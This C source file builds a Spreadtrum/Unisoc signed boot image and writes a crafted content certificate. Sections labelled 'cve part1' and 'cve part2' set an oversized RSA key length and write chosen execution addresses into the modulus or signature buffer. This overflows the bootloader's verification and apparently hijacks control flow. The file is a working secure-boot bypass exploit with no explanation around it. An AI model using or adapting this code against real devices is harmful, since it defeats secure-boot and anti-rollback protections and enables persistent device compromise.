#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <string.h>
#include "mincrypt/sha256.h"

#define TRUE 1
#define FALSE 0

typedef struct {
    uint32_t  mMagicNum;        // "BTHD"=="0x42544844"=="boothead"
    uint32_t  mVersion;         // 1
    uint8_t   mPayloadHash[32]; // sha256 hash value
    uint64_t  mImgAddr;         // image loaded address
    uint32_t  mImgSize;         // image size
    uint32_t  is_packed;        // packed image flag 0:false 1:true
    uint32_t  mFirmwareSize;    // runtime firmware size
    uint8_t   reserved[452];    // 452 + 15*4 = 512
} sys_img_header;

#define MAGIC_SIZE 8
typedef struct sprdsignedimageheader {

    /* Magic number */
    uint8_t magic[MAGIC_SIZE];
    /* Version of this header format */
    uint32_t header_version_major;
    /* Version of this header format */
    uint32_t header_version_minor;

    /*image body, plain or cipher text */
    uint64_t payload_size;
    uint64_t payload_offset;

    /*offset from itself start */
    /*content certification size,if 0,ignore */
    uint64_t cert_size;
    uint64_t cert_offset;

    /*(opt)private content size,if 0,ignore */
    uint64_t priv_size;
    uint64_t priv_offset;

    /*(opt)debug/rma certification primary size,if 0,ignore */
    uint64_t cert_dbg_prim_size;
    uint64_t cert_dbg_prim_offset;

    /*(opt)debug/rma certification second size,if 0,ignore */
    uint64_t cert_dbg_developer_size;
    uint64_t cert_dbg_developer_offset;

} sprdsignedimageheader;

#define RSA_KEY_BYTE_LEN_MAX 0x100

typedef struct sprd_rsapubkey {
    uint32_t keybit_len;	//1024/2048,max 2048
    uint32_t e;
    uint8_t mod[RSA_KEY_BYTE_LEN_MAX];
} sprd_rsapubkey;

#define HASH_BYTE_LEN 32
typedef struct sprd_contentcert {
    uint32_t certtype;	//0:content cert
    sprd_rsapubkey pubkey;	//pubkey for this cert, to verify signature in this cert
    uint8_t hash_data[HASH_BYTE_LEN];	//hash of image component
    uint32_t type;
    uint32_t version;
    uint8_t signature[RSA_KEY_BYTE_LEN_MAX];	//signature of hash_data
} sprd_contentcert;

void do_sha256(uint8_t* data, int bytes_num, unsigned char* hash)
{
    SHA256_CTX ctx;
    const uint8_t* sha;

    SHA256_init(&ctx);
    SHA256_update(&ctx, data, bytes_num);
    sha = SHA256_final(&ctx);

    memcpy(hash, sha, SHA256_DIGEST_SIZE);
}

static uint8_t* loadfile(const char* fn, size_t* num, size_t extra) {
    size_t n, j = 0; uint8_t* buf = 0;
    FILE* fi = fopen(fn, "rb");
    if (fi) {
        fseek(fi, 0, SEEK_END);
        n = ftell(fi);
        if (n) {
            fseek(fi, 0, SEEK_SET);
            buf = (uint8_t*)malloc(n + extra);
            if (buf) j = fread(buf, 1, n, fi);
        }
        fclose(fi);
    }
    if (extra) memset(&buf[n], 0, extra);
    if (num) *num = j;
    return buf;
}

enum ITEM_ID {
    ID_MIN = 0,
    ANTI_ROLLBACK_VERSION = ID_MIN,
    EXECUTE_ADDR,
    G_N_ADDR,
    G_SIG_ADDR,
    MEM_USAGE,
    ID_MAX = MEM_USAGE
};

#define LIST_MAX   20
typedef struct _ITEM_CFG { /* Information of every item */
    uint32_t               id;
    char               str[20];
    uint64_t           num;
} ITEM_CFG;
static ITEM_CFG cfg[LIST_MAX];
static uint32_t item_num = 0;

static int _get_cfg(char* cfg_p)
{
    char line[512];
    uint32_t i = 0;
    FILE* cfg_fd;

    if (!(cfg_fd = fopen(cfg_p, "r"))) {
        printf("open cfg file error\n");
        return FALSE;
    }
    memset(cfg, 0, sizeof(cfg));
    item_num = 0;
    while (fgets(line, sizeof(line), cfg_fd)) {
        if (line[0] == '#' || line[0] == '\0') {
            continue;
        }
        if (-1 == sscanf(line, "%d %s", &cfg[i].id, cfg[i].str)
            ) {
            continue;
        }
        cfg[i].num = strtoull(cfg[i].str, NULL, 0);
        printf("%d\t0x%llx\t\n", cfg[i].id, cfg[i].num);
        i++;
        item_num++;
        if (LIST_MAX <= i) {
            printf(" Max support %d item, this config has too many item!!!\n", LIST_MAX);
            fclose(cfg_fd);
            return FALSE;
        }
    }
    fclose(cfg_fd);
    return TRUE;
}

#define ERR_EXIT(...) \
    do { fprintf(stderr, __VA_ARGS__); exit(1); } while (0)

#define WRITE32_BE(p, a) do { \
	((uint8_t*)(p))[0] = (a) >> 24; \
	((uint8_t*)(p))[1] = (a) >> 16; \
	((uint8_t*)(p))[2] = (a) >> 8; \
	((uint8_t*)(p))[3] = (uint8_t)(a); \
} while (0)

int main(int argc, char** argv)
{
    if (argc < 3) ERR_EXIT("Usage: %s <cfg> <filename>\n", argv[0]);

    if (!_get_cfg(argv[1]))
    {
        printf("Read cfg file error !\n");
        return 1;
    }
    if (!cfg[G_N_ADDR].num && !cfg[G_SIG_ADDR].num) ERR_EXIT("g_n/g_sig cfg error\n");

    char* filename = argv[2];
    uint8_t* mem; size_t size = 0;
    mem = loadfile(filename, &size, 16);
    uint8_t* mem0 = mem;
    if (!mem) ERR_EXIT("loadfile(\"%s\") failed\n", filename);
    if (remove(filename)) ERR_EXIT("Failed to delete the file.\n");

    printf("file size: 0x%zx\n", size);
    int raw = 1;
    size = (size + 15) & 0xFFFFFFF0;
    if (*(uint32_t*)mem == 0x42544844) {
        if (!(*(uint32_t*)&mem[0x30])) ERR_EXIT("broken sprd trusted firmware\n");
        raw = 0;
        size = *(uint32_t*)&mem[0x30];
    }
    printf("payload size: 0x%zx\n", size);

    FILE* file = fopen(filename, "wb");
    if (file == NULL) ERR_EXIT("Failed to create the file.\n");

    //HEADER
    sys_img_header   img_h;
    memset(&img_h, 0, 0x200);
    img_h.mMagicNum = 0x42544844;
    img_h.mVersion = 1;
    img_h.mImgSize = size;
    if (0x200 != fwrite(&img_h, sizeof(unsigned char), 0x200, file)) ERR_EXIT("Failed to write the header.\n");

    if (!raw) mem += 0x200;
    if (size != fwrite(mem, sizeof(unsigned char), size, file)) ERR_EXIT("Failed to write payload.\n");

    //FOOTER
    sprdsignedimageheader img_f;
    memset(&img_f, 0, 0x60);
    img_f.payload_size = size;
    img_f.payload_offset = 0x200;
    img_f.cert_size = sizeof(sprd_contentcert);
    img_f.cert_offset = size + 0x200 + 0x60;
    if (0x60 != fwrite(&img_f, sizeof(unsigned char), 0x60, file)) ERR_EXIT("Failed to write the footer.\n");

    //cve part1
    int maxnumid = ID_MAX + 1;
    int minnumid = ID_MAX + 1;
    for (int i = ID_MAX + 2; i < item_num; i++)
    {
        if (cfg[maxnumid].num < cfg[i].num)
        {
            maxnumid = i;
        }
        if (cfg[minnumid].num > cfg[i].num)
        {
            minnumid = i;
        }
    }
    int length_needed = cfg[maxnumid].num - cfg[minnumid].num;
    if (cfg[G_N_ADDR].num)
    {
        if((length_needed - (2 * RSA_KEY_BYTE_LEN_MAX + HASH_BYTE_LEN)) >= 0) length_needed += 0x1C;
        else length_needed = sizeof(sprd_contentcert);
    }
    else
    {
        length_needed = (length_needed > (RSA_KEY_BYTE_LEN_MAX - 0x10)) ? (length_needed + 0x144) : sizeof(sprd_contentcert);
    }

    //cert
    sprd_contentcert* img_cert = (sprd_contentcert*)malloc(length_needed);
    memset(img_cert, 0, length_needed);
    img_cert->certtype = 0;
    img_cert->pubkey.e = 0x01000100;
    do_sha256(mem, size, &img_cert->hash_data[0]);
    img_cert->type = 1;
    img_cert->version = cfg[ANTI_ROLLBACK_VERSION].num;
    if (!raw)
    {
        uint32_t version_in_file = 0;
        if(*(uint32_t*)&mem[size + 0x60] == 0) version_in_file = *(uint32_t*)&mem[size + 0x190];
        else if(*(uint32_t*)&mem[size + 0x60] == 1) version_in_file = *(uint32_t*)&mem[size + 0x1B0];
        if (img_cert->version < version_in_file) img_cert->version = version_in_file;
    }

    //cve part2
    if (cfg[G_N_ADDR].num)
    {
        img_cert->pubkey.keybit_len = (cfg[maxnumid].num + 8 - cfg[G_N_ADDR].num) * 8;
        printf("using G_N_ADDR\n");
    }
    else
    {
        img_cert->pubkey.keybit_len = (cfg[maxnumid].num + 8 - cfg[G_SIG_ADDR].num) * 8;
        printf("using G_SIG_ADDR\n");
    }
    printf("keybit len: 0x%x\n", img_cert->pubkey.keybit_len);

    for (int i = ID_MAX + 1; i < item_num; i++)
    {
        int extra = 0;
        if (cfg[G_N_ADDR].num) {
            if ((cfg[maxnumid].num - cfg[i].num > RSA_KEY_BYTE_LEN_MAX - 0x10) && (cfg[maxnumid].num - cfg[i].num < RSA_KEY_BYTE_LEN_MAX + HASH_BYTE_LEN + 0x10))
            {
                //overflow here will break img_cert.hash_data or img_cert.type or img_cert.version
                printf("0x%llx skiped due to pubkey.n overflow\n", cfg[i].num);
                continue;
            }
            if (cfg[EXECUTE_ADDR].num == 0x5700 && cfg[maxnumid].num - cfg[i].num > 2 * RSA_KEY_BYTE_LEN_MAX + HASH_BYTE_LEN) extra = 0x3B0;
            WRITE32_BE((char*)&img_cert->pubkey.mod + 4 + cfg[maxnumid].num - cfg[i].num, cfg[EXECUTE_ADDR].num);
            WRITE32_BE((char*)&img_cert->pubkey.mod + 4 + cfg[maxnumid].num - cfg[i].num + 8, cfg[i].num - 8 + cfg[MEM_USAGE].num + extra);
        }
        else
        {
            if (cfg[EXECUTE_ADDR].num == 0x5700 && cfg[maxnumid].num - cfg[i].num > RSA_KEY_BYTE_LEN_MAX - 0x10) extra = 0x3B0;
            WRITE32_BE((char*)&img_cert->signature + 4 + cfg[maxnumid].num - cfg[i].num, cfg[EXECUTE_ADDR].num);
            WRITE32_BE((char*)&img_cert->signature + 4 + cfg[maxnumid].num - cfg[i].num + 8, cfg[i].num - 8 + cfg[MEM_USAGE].num + extra);
        }
    }
    if (length_needed != fwrite(img_cert, sizeof(unsigned char), length_needed, file)) ERR_EXIT("Failed to write cert.\n");
    free(img_cert);
    fclose(file);
    free(mem0);

    return 0;
}
